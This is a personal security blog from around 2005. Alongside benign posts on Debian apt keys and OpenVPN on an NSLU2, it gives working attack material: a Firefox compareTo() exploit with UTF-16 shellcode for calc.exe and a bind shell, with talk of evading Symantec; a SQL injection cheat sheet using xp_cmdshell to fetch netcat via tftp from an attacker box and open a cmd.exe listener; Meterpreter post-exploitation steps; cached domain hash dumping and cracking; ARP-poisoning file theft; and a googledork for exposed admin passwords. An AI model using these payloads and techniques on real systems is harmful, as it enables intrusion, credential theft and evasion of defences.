
#create string and send
str = string("HEAD / HTTP/1.0\r\n\r\n");
send(socket:soc, data:str);

#grab data from the socket
name = recv(socket:soc, length:1024);

#grep for the line with server in it
server = egrep(pattern:"Server.*", string : name);

#if grep returns value
if(server){
display(server," On IP ",hostip,"\n");
}

#close socket
close(soc);
}

Links:
http://michel.arboi.free.fr/nasl2ref/
http://www.oreillynet.com/pub/a/security/2004/06/03/nessus_plugins.html
http://www.virtualblueness.net/nasl.html

GPG Signature Checking w/ Debian And Apt 0.6

2006-01-07T04:16:00.001-06:00

In new versions of apt. GPG signature checking is enabled by default. This is a good thing, allowing us trust the packages we are installing on our system. But if you recently updgraded apt it will begin to complain about not being able to find the pubkey. It should look something like this.

W: GPG error: http://mirrors.kernel.org testing Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 010908312D230C5F

Now I just recently got sick of seeing this message and decided I should really get this working for security reasons. That being said I am a bit new to this. There are many documents out there on how to get this working, I am just documenting different things I did and found. Hopefully once I fully understand the process I will clean this up.

First, you will need to have a 0.6 version of apt and gnupgp installed.

Once you have that an easy way to try and fix this problem is install the debian-keyring.

apt-get install debian-keyring

Now we can import the key using apt-key.

apt-key add /usr/share/keyrings/debian-keyring.gpg
apt-key add /usr/share/keyrings/debian-role-keys.gpg

Now I am really not sure what the difference is between them.
This fixed my message of NO_PUBKEY for ftp.nerim.net
If you don't have this in your sources.list and its a desktop. I really would add this, alot of video and media type debs that debian does not carry. Link below:
http://debian.video.free.fr

Ok, back to buisness. apt is still complaining about my kernel.org mirror.
I read somewhere that a new key will added every year on the year. Somehow I did not have that new key from the debian-keyring package. So lets go get it.

wget http://ftp-master.debian.org/ziyi_key_year.asc

Now I just added it with apt-key but you could just do it with gpg.

gpg --import ziyi_key_2006.asc

or

apt-key add ziyi_key_2006.asc

Now apt-get update and it should be fixed. Like I said earlier, I'm a little unclear about this whole process. I would have thought downloading the whole debian-keyring would have done it. It is even over kill becuase I really only needed a couple of keys.

Links:
http://www.debian-administration.org/articles/174
http://secure-testing-master.debian.net/
http://lists.debian.org/debian-user/2005/11/msg00064.html
http://moonbase.rydia.net/mental/blog/life/mixing-ubuntu-and-debian.html

OpenVPN on NSLU2

2005-12-18T10:57:00.001-06:00

Well I finally picked up a NSLU2 by Linksys. Have to say I am pretty impressed so far. A little device that fits in my hand just replaced 2 of my boxes at home. One for my fileserver and one for my openvpn server. Maybe at a later date I will go about how to flash it with unslung. But it is pretty easy so this doc is just for me to remember how I set up my openvpn.

So first thing is first go buy the NSLU2 and download unslung and flash it.
http://www.nslu2-linux.org/

Now you have it flashed. I put on a few packages first to allow me to work with it a bit better.
OpenSSH
Vim
Bash
Grep

Ok Now we are ready.
SSH to your NSLU2. If you have not set your password yet the default password is "uNSLUng"

Install OpenVPN:
ipkg update;ipkg -force-depends install openvpn

Create Tun:
mkdir /dev/net
mknod /dev/net/tun c 10 200

Install Tun:
insmod tun

Enable Routing:
echo 1 > /proc/sys/net/ipv4/ip_forward

Now its time to generate our certs. I just downloaded openvpn on to my machine to create them. Goes much faster this way
You can download the current openvpn version here.
http://openvpn.net/
Also more details on this process can be found here.
http://openvpn.net/howto.html#pki

CD into the easy-rsa directory and edit the vars file with your information.

. ./vars
./clean-all
./build-ca

Now that the CA is up, we can build the keys for the server.

./build-key-server server

Now we have to build our client certs. I will only be buildling it for one client. I also use password protected certs.

./build-key-pass client1

Note: If you wanted other clients repeat the step with client2(or whatever you like). Remember to always use a unique common name for each client.

Generate Diffie Hellman parameters.
./build-dh

Now we need to create a direcotry on the NSLU2 to copy our keys to.
mkdir -p /opt/etc/openvpn/keys

You can copy these files to the NSLU2, may be a bit different for you:
ca.crt, ca.key, dh1024.pem, server.crt, server.key, 01.pem, 02.pem, 03.pem, and 04.pem

Now lets create a server.conf on the NSLU2 and write our conf file.
You can get a sample conf file from the previous download. I will just touch on the main things I change below.

I use TCP so I can proxy:
# TCP or UDP server?
proto tcp
;proto udp

Choose a cipher of your choice. Must be the same on the client.
# Select a cryptographic cipher.
# This config item must be copied to
# the client config file as well.
;cipher BF-CBC # Blowfish (default)
;cipher AES-128-CBC # AES
;cipher DES-EDE3-CBC # Triple-DES

Make sure it switches to priv nobody.
# You can uncomment this out on
# non-Windows systems.
user nobody
group nobody

Thats pretty much it for the server side.

For the client side. Its pretty much straight forward.Just make sure you have the right certs.
ca.crt
client1.crt
client1.key

Now back to the NSLU2.

For a while I have been trying to get MASQUERADE in iptables to work. But since the module is not in the ipkg repository and it is not enbaled in the kernel, this was not working. If you view the comment below Cooper did get this working and wrote a how-to for this. Since he wanted MASQUERADE for something a bit different I will document how I did it. I wanted it so I can hit other boxes behind the VPN. Without having to creat SSH tunnels (Which is what I was doing).
Here is Cooper's doc on the NSLU site.

http://www.nslu2-linux.org/wiki/HowTo/EnableIPMasquerading

Now, for what I did for MASQUERADE.

First, I install the MASQUERADE modules, I used pre-compiled ones since I'm lazy. You can compile them yourself if you like, Cooper's doc shows you how. Below is a link to pre-compiled ones.

http://www.defector.de/docs/nslu2-ipmasq.htm

Now you can install these.

ipkg-cl install kernel-module-ipt-masquerade_2.4.22.l2.3r63-r7_nslu2.ipk
ipkg-cl install kernel-module-ipt-state_2.4.22.l2.3r63-r7_nslu2.ipk

Now lets install the modules.

insmod ip_tables
insmod iptable_filter
insmod ip_conntrack
insmod iptable_nat
insmod ipt_state
insmod ipt_MASQUERADE

If some modules cannot be found, I may have forgot to document these when I was messing around with different modules.
You can easily find and install them. I actually don't think you even need ipt_state or iptable_filter but I put them in there anyways to have a more full blown iptables.(in case of future work)

example:
ipkg list |grep conntrack

Now lets get all this stuff to run on reboot.

Create /opt/etc/init.d/S24openvpn and make it +x.

###################################################
#!/bin/sh

if [ -n "`pidof openvpn`" ]; then
/bin/killall openvpn 2>/dev/null
fi

# load kernel modules
/sbin/insmod tun
/sbin/insmod ip_tables
/sbin/insmod iptable_filter
/sbin/insmod ip_conntrack
/sbin/insmod iptable_nat
/sbin/insmod ipt_state
/sbin/insmod ipt_MASQUERADE

# enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# set iptables rule
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o ixp0 -j MASQUERADE

# Startup VPN tunnel in daemon mode
/opt/sbin/openvpn --cd /opt/etc/openvpn --daemon \
--log-append /var/log/openvpn.log \
--config server.conf
###################################################

Now you are all set! Test it out !

Thanks to everyone!

Fun w/ FireFox compareTo() Remote Execution

2005-12-15T15:33:00.001-06:00

I love firefox, but just could not resist this.

A vulnerbility was found in Mozilla Firefox <= 1.04 when using the
compareTo() function.
http://www.milw0rm.com/id.php?id=1369

You can find older versions of FireFox for testing here.
http://ftp.mozilla.org/pub/mozilla.org/firefox/releases/

The exploit payload contained a return(Just would close the browser).
And what fun is that?

// Payload - Just return..
var payLoadCode=unescape("%u9090%u90C3");

So I thought lets actually execute some abritrary code.

The thing that makes it hard is we cannot just use normal shellcode. We
have to convert it to UTF-16 so the browser can execute it. I suppose
UTF-8 would work also.

For Example:

\x29 would be %u785c%u3932

So here we go, create the shellcode and encode it to UTF-16.
How about something simple like calc.exe.

I found a shellcode encoder. I have had mixed results but you can find it here.
http://www.milw0rm.com/id.php?id=656

// Payload - Calc.exe
var payLoadCode=unescape(
"%u5053%u5053%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7"+
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");

Loaded the page, firefox shutdown and calc.exe poped-up. We can execute!
(tested on WinXP SP2)

While calc.exe was funny not to useful.

Lets bind a port so we can get a shell.

I tried creating different shellcode, things such as adding a user,port
binding, cmd exec, and reverse shells, In both Linux and Windows. The
shellcode was very touchy and had mixed results after encoding to
UTF-16.

This win32 bind shell code did work on WinXP SP2 from SkyLined.

// Payload - Win32 bindshell (port 28876) - SkyLined
var payLoadCode=unescape("%u4343%u4343%u43eb"+
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea"+
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7"+
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64"+
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c"+
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe"+
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0"+
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050"+
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6"+
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650"+
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa"+
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656"+
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1"+
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353"+
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353"+
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe"+
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff"+
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");

Opened the page in FireFox and telneted to port 28876

Although, Symantec did see it as being a Trojan about one minute later.

I will look into changing the shellcode a bit in hope of not triggering Symantec.
Otherwise you would only have one minute after exploit to plant a backdoor.

The exploit uses a method called spraying the stack. Its actually a
pretty cool method by SkyLined to find a predictable address.

I will continue to work on this when time permits, If anyone is
interesed I would like to see other UTF-16 encoded shellcode that
works.

Here is a UTF-16 Payload by SkyLined that is not suppose to set off virus scanners.
I have not tested this one yet.

payLoadCode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");

Below are some links to more info.

http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0104.html
http://www.edup.tudelft.nl/~bjwever/advisory_msie_R6025.html.php

SQL Injection Cheat Sheet

2005-11-29T10:57:00.001-06:00

A small reference when testing and using SQL Injection.

Note: This is for my reference, so if there is not enough detail I apologize.

Testing For SQL Injection Vulnerabilities:

We want to see if the input is sanitized or checked, below is something you can insert into the form to check.

ba' or 1=1--

Example:
User: ba' or 1=1--
Pass: ba' or 1=1--

Query Manipulation:

SELECT * FROM table WHERE user='ba'

-TO-

SELECT * FROM table WHERE user='ba' or 1=1--

Other examples (Depending on how the query was written here are other options to try) :

' or '1'='1
' or 1=1--
" or 1=1--
or 1=1--
' or '1'='1
" or "1"="1
') or ('1'='1

Note:( -- ) Is only needed for MS SQL servers. The ( -- ) will tell the server to ignore the rest of the query sometimes can replace with ( # ). This will make sure your signal quotes ( ' ) are in order. Also, if field is hidden you can run the form from your local box w/ the injection in it.

Remote Execution on MS SQL:

Now we know the server is vulnerable, while being nice, the above does not always allow us to bypass the login screen. Or we just may want to do something different. Here is an option.

Start a sniffer on a box you own:

# tcpdump udp and port 53 and victimhostname

Now make the victim do a DNS query against your box:

’; EXEC master..xp_cmdshell ‘nslookup mybox.com’ --

You will see the dns query in your tcpdump output. Which means the EXEC worked! Now you can do whatever you like. For demonstration purposes lets just upload NetCat and execute.

'; EXEC master..xp_cmdshell ‘tftp –I mybox.com GET nc.exe c:\nc.exe' --

Now execute netcat so it’s listening.

'; EXEC master..xp_cmdshell ‘c:\nc.exe –l –p 9999 –e cmd.exe’ –-

Now if you know what to do the box is all yours!

Note: The ( ; ) will end the previous query and start the next. Also, if the ( ' ) is not working try a ( " ).

Conclusion: This is very basic SQL injection. Since it is just a cheat sheet I did not want this to become to long. Later I will cover other topics such as info gathering from ODBC error messages, Column gathering, querying specific things, blind SQL injection.

Other Good Docs:
http://www.securiteam.com/securityreviews/5DP0N1P76E.html
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf

Web Attacking Through Google

2005-11-07T15:55:00.001-06:00

An attacker just may be able to do web based attacks through google. The goal of the attacker would be to have google process the malicious request against the target.

I first tested it with the ad-content section of the personal google page, which seems it does at least need some type of RSS content to process it.

For example, Here is a very very basic directory traversal attack:
http://target/showfile.pl?f=../../../fileyouwant

At first I was thinking you can add this to "add content" on the personal page. Didn't seem to work. Like I said earlier it does want some type of RSS content.

So I then tried something like this in "add content".
http://rsssite/rss.php?xml+http://target/showfile.pl?f=../../../fileyouwant

Still no go.

So then I thought google caching.
Basically you setup a static html page on some free web hosting company,the page would have all of the attack links(directory traversals,sql injections,php exploits, etc.)

Wait for google to cache it.
Viewing the page through google cache, the attacker could then launch all of the attacks from google.
This would all be done with a point and click.

Not really that dangerous since if you really wanted to find the attacker, google could provide you with logs. But it would be from an anonymous web site and would be two more steps.(could even proxy the registration of the site)

It would look weird for the person watching the IDS(google attacking??) some may even not think anything of it,thinking its the just the googlebot. Also, it would be hard for the target to block you considering most places do not want to block google.

This just kind of follows up Johnny Long's idea of zero-packet attacks.
http://www.blackhat.com/presentations/bh-usa-05/bh-us-05-long.pdf

Post-Exploitation w/ Meterpreter

2005-11-03T08:41:00.001-06:00

Since I seem to forgot how to use Meterpreter everytime. Figured I would just document some basic functions of it.

More information can be found at http://www.metasploit.org

After the box is exploited and you have Meterpreter on the payload you can begin to use.

There are many extenstions that can be used. Different extentions provide different uses.

1. Fs
Provides interaction with the filesystem on the remote machine.
2. Net
Provides interaction with the network stack on the remote machine.
3. Process
Provides interaction with processes on the remote machine.
4. Sys
Provides interaction with the environment on the remote machine.

Here is how you load them.
use -m Process
loadlib: Loading library from ’ext950591.dll’ on the remote machine.

There is a lot you can do but I'm just going to show the what I use the most.
Below will get you a cmd prompt on machine.(assuming its windows)

meterpreter> execute -f cmd -c
execute: Executing ’cmd’...

execute: success, process id is 3516.
execute: allocated channel 1 for new process.

You now have to interact with the assigned channel. Then you got cmd!

meterpreter> interact 1
interact: Switching to interactive console on 1...
meterpreter>
interact: Started interactive channel 1.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS>
Caught Ctrl-C, close interactive session? [y/N] y

With the Fs extentsion you can download and upload files.

meterpreter>use -m Fs
meterpreter>download file location

And thats pretty much what I use the most. Maybe later I will write an advanced section.

Grabbing And Cracking Cached Domain Hashs(mscash) w/ John

2005-10-28T14:15:00.001-05:00

This is something I wrote up a while back. Not that great but wanted to document it before I lost it.

---

Background: Its great gaining local admin on a windows box,but then you are limited to that box.
Its much more useful getting a Domain user or even Domain Enterprise Admin!
Assumming you are on a Domain.
Most Windows Domains have password caching turned on.
Which means anytime a domain user logs into the box it is cached in the registry with SYSTEM rights.
Now lets see how we can grab this and crack it.

Note: I only did this in Linux, I have no idea if it work in windows.
Also, I will not go into much technical details on the caching. Google if you want to learn more.
The info is out there.

Tools: 1. John The Ripper(1.6.37) - http://www.openwall.com/john/ (you will need the src, we will patch it)
2. mscashdump - http://www.off-by-one.net/misc/cachedump.html
3. John The Ripper Patch - http://www.banquise.net/misc/patch-john.html (get "the big patch")

Steps: 1. Compile and Patch John(john dir and patch must be in same dir)
-tar xfz john-1.6.37.tar.gz
-gunzip -c john-1.6.37-bigpatch-13.diff.gz | patch -p0 (should see it patching files)
-cd john-1.6.37/src/
-make

Note: Now you have john patched,it can accept much more hashes such as mscash. Another favorite
of mine is Lotus Notes, its pretty easy to get anyone’s Notes hash without even being a user.
I'll save that for a different doc, we'll stick with mscash.

2. Get cached passwords from windows box (must be local admin)
-cmd.exe
-cachedump.exe -v (should first install a service to get SYSTEM rights)
-Output should look like the following.

CacheDump service successfully installed.
Service started.
user1:5E9092870891234FEF30940952359045633456:domain:
domainadmin:D938458093490BF9035649095CC334:domain:
user2:8982390FAB93099EF30940945745:domain:
Service successfully removed.

-copy and paste the hashs to a txt file for john.

3. Now we get to crack it. Your choice on brute or dict.
-./john -format:mscash ./mshashs.txt

Note: Now you just have to wait. Depending on how good the password is.
And that’s It. Have Fun

References:
http://www.off-by-one.net/misc/cachedump.html
http://www.banquise.net/misc/patch-john.html

All Your File Are Belong To Us

2005-10-28T09:17:00.001-05:00

Been testing a neat little app called tcpxtract.
http://tcpxtract.sourceforge.net/

What it does is grab files from sniffed traffic though "carving". Can be
used against live sniffing or against a pcap file.

Findings so far:

First, I thought I would run it against a kismet pcap file I had laying
around.
Turned up with a couple of images, must have been people browsing the web.
I would assume other files would work no problem, since wireless it is not a
switched network and all the traffic anyone can see.

1. FILES OWNED

Second, I thought I would fire up ethereal http://www.ethereal.com/ and bind
it to my local Ethernet card to sniff.
I did a few file transfers during the sniff. SCP, FTP, Windows SMB Share(AD
Kerbros)
Saved the sniff in a pcap file and ran tcpxtract against it.

- SCP, I obviously did not grab that file I transferred.
- FTP, Do I even have to tell?
- SMB, Yep grabbed that file too

2. FILES OWNED

Third, I was thinking this isn't that useful. Why do I want to see my own
files transferred and on
a wireless network anyone to transfer anything useful, is just plain stupid.

So, I got to thinking how about a "man in the middle" attack? I Fire up the
handy ettercap http://ettercap.sourceforge.net/
and poison the arp cache on the switch and route all traffic to my local
Ethernet card and then route the packets to their final destination.

Now since all the switch traffic is running though my Ethernet device. I
bind tcpxtract to my
local Ethernet device. And the files started to pour in (mpg, mp3,doc,pdf ,
etc) a lot.

3. FILES OWNED

Now, I'm sure people see the danger here. For security testers/auditors its
a way to rid your company of using
ftp and other non-secure protocols. Do that attack against some highly
sensitive servers, and then show your
manager all the nice sensitive documents you mined!

I will be looking into other methods of using tcpxract.

Snort Back Orifice Preprocessor Buffer Overflow

2005-10-18T09:47:00.001-05:00

While looking into US-CERT TA-05-291A. This is what I found.

While snort does review the traffic on port 31337, it will also look
for any UDP traffic that is using Back Orifice's magic cookie.

* spp_bo.c comments
*
* Purpose: Detects Back Orifice traffic by brute forcing the weak encryption
* of the program's network protocol and detects the magic cookie
* that it's servers and clients require to communicate with each
* other.
*
* Back Orifice magic cookie is "*!*QWTY?", which is located in the first
* eight bytes of the packet. But it is encrypted using an XOR.

When exploiting this we want this function of the preprocessor to kick
off. Which is why you will have to create a UDP packet that is not
using port 31337.

Below is where the fun happens.

//snippet from spp_bo.c
static int BoGetDirection(Packet *p, char *pkt_data)
{
u_int32_t len = 0;
u_int32_t id = 0;
u_int32_t l, i;
char type;
char buf1[1024]; #Interesting ??? A static array? Is this checked? hehe
char buf2[1024]; #Interesting ??? A static array? Is this checked? hehe
char *buf_ptr;
char plaintext;
//snippet from spp_bo.c

I don't see any checks.

//snippet from spp_bo.c
/* Only examine data if this a ping request or response */
if ( type == BO_TYPE_PING )
{
i = 0;
buf_ptr = buf1;
*buf1 = 0;
*buf2 = 0;
/* Decrypt data */
while ( i < len )
{
plaintext = (char) (*pkt_data ^ (BoRand()%256));
*buf_ptr = plaintext;
i++;
pkt_data++;
buf_ptr++;
if ( plaintext == 0 )
buf_ptr = buf2;
}

/* null-terminate string */
*buf_ptr = 0;

DEBUG_WRAP(DebugMessage(DEBUG_PLUGIN, "buf1 = %s\n", buf1););

if ( *buf2 != 0 )
{
DEBUG_WRAP(DebugMessage(DEBUG_PLUGIN, "buf2 = %s\n",buf2););
}

DEBUG_WRAP(DebugMessage(DEBUG_PLUGIN, "crc = 0x%x\n", (char)
(*pkt_data ^ (BoRand()%256))););

if ( len > 4 && !strncasecmp((buf1+3), "PONG", 4) )
{
return BO_FROM_SERVER;
}
else
{
return BO_FROM_CLIENT;
}
}
//snippet from spp_bo.c

To validate it a bit more I ran the code through flawfinder. This is
the output.

Examining spp_bo.c
spp_bo.c:430: [2] (buffer) char:
Statically-sized arrays can be overflowed. Perform bounds checking,
use functions that limit length, or ensure that the size is larger
than
the maximum possible length.
spp_bo.c:431: [2] (buffer) char:
Statically-sized arrays can be overflowed. Perform bounds checking,
use functions that limit length, or ensure that the size is larger
than
the maximum possible length.

Just my findings.

kPan1c.dc414.org

2005-10-07T08:44:00.001-05:00

Just added this blog with masking to http://kPan1c.dc414.org. So you can always just hit that.

GoogleDork SysPrep Hack

2005-10-06T19:12:00.001-05:00

Not sure if you guys know what googledorks are. Basically custom google
querys that find some interesting stuff. Johnny Long talks a lot more
about them and has a whole database of them on his site
http://johnny.ihackstuff.com/.

Now to the fun stuff. Not sure if this has been done or not but here it
goes.

I was talking to someone about sysprep (things it does, options you can
set, etc.)

Which got me thinking of my next idea.

GoogleDork:
+"AdminPassword" | "DomainAdmin" | "DomainAdminPassword"
inurl:sysprep.inf

I know this is a pretty simple googledork(but you would be amazed at
the findings). If anyone has a better way of doing it or expanding it,
I would love to see it.

Just Up

2005-08-30T09:33:00.001-05:00

Just my site to document my thoughts. Went with livejournal because of the linux client. My icon of the keyboard is just when I was bored with my camera phone. Nothing else to say.